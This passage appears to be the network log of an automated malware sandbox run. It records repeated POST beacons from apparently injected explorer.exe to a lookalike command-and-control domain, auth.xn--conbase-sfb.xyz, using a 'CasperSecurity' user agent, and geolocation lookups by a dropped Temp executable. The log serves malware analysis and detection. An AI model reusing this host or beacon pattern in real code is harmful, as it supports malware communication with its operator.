                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.278930902 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.977922916 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:03 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SOgBgz369WOoBgZMwp5YhrWfDmU1OQrWqdcgN5gq75fnEJUAmH5P9mavOnvDCxuoZBY5afuX0VQlurLsQE8gTrywOKFX8j3utUQIQ4SoK4CiP8rN9u%2BWwnMZ7BlOUkgTIX5RNxQXrAo0Dw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fc70abb03d5-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                51192.168.2.449818188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.101862907 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.106735945 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.841696978 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:04 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FrfpekPiSyWMlEv5CzKypnoxb0kvzzzxB%2BooFciQJZkGa92g%2FVsO4Iv39rwrQpAroA4jfAyuhYj%2BkjDHAD7gBwCCFGc1MC4xdgngmOZjyapB3dNNvCp6pDRp6c3ckKNfl7mbF6sraZWauM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fcc4dd341c1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                52192.168.2.449820188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.964754105 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.971834898 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.142360926 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:06 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x88LsBjV7Z%2BsZNaHzrXGgRVxRabR8drv0k%2Bc2EYkXcJEHPQSbpmugjakNz0inxeABRqEuS0PMJUaTdDtmhM%2BGCVeQIGQyBd00PKYbLEvWY0WmuVoM8wvMgR4w1VgQacPR%2BXk4Lm8mk%2Fbc5g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fd19cf10ca4-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                53192.168.2.449821188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.260272980 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.265111923 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.007846117 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vai2hAROde3zJ9GzI1fB7GJGsXj%2FPbo70Qh%2BcQq1u7ak4P3wVITh%2Fnn%2BvrhWVJbvUk9gCP7nGKxoyzwIPrrsi6JD%2FMPd6PxouChYgIOf4UHeAWaQH9Z%2FQZjdASUr3NGzliYJlWi27zNy5oI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fd9bd274374-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                54192.168.2.449823188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.134244919 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.138993025 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.875502110 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:08 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAwnPGZi4KklvCOTnAkLMILPJwDoVPLtWf%2B4O2VihvbC1%2FZ96TV7Sg0e5gzcB1J%2BFCCQldR61tdtedJ1FLX17iXtm31yQtd6gBzx8VyIff%2B6F%2B1oDNVlKoiouCyTNaUzGWsMOIdtit2Y3ZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fe588614364-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                55192.168.2.449825188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.993180990 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.000973940 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.773951054 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:09 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGNxPx7aY%2BTfV%2BWcyHAhlxs5cNp0zRyFDUt%2BKrkLoZNaMhfqjZnSroAJN%2FDzBnN3I0PMLBC%2FGcrRVXBaSiXbCniCl5fhfZJml%2FjY5YrHoRzoHFeXiU79ZmiPk3KbczR571Gb7L6c5wFdk%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3feacfbd1845-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                56192.168.2.449827208.95.112.1807244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.892272949 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.367538929 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:10 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 60
                                                                                                                                                                                                                                X-Rl: 44
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.2.449828188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.898941994 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.903961897 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.625601053 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:10 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqX4YBOb7EXozKG8rUyKvSSoZaPXWiXySPNUs6j3wRjCoUH4MIqvSTV8XkmqrmjIjGza2dpP48xtoTZhhzt90vM5aFVpW3096trZYVzk40ngT%2FI0iXLIGYHVddKkUQ5x5iBgxLjMvqZoXuk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ff08afa4379-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                58192.168.2.449829188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.743030071 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.748076916 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.450417042 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:11 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIMX694r5HzVwFKQN5sAv74AorXonJQ%2BsuKlZtCjEx6sqPF5NmPIpOGCtUwzF%2FCZaXG2TYM%2BfvN93QMy%2BOqeCwxtiR7hwAYLysXKbi%2BWNAe9Yp39yEteAvs4hqca6AIceVxVR%2B%2BysAhoViE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ff5bc578cd6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                59192.168.2.449830208.95.112.1807244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.796139002 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.296493053 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:11 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 59
                                                                                                                                                                                                                                X-Rl: 43
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                60192.168.2.449833188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.609117985 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.615459919 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397460938 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ffb1bef42d1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398216963 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ffb1bef42d1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398879051 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ffb1bef42d1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                61192.168.2.449834208.95.112.1807244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.170983076 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398053885 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 57
                                                                                                                                                                                                                                X-Rl: 42
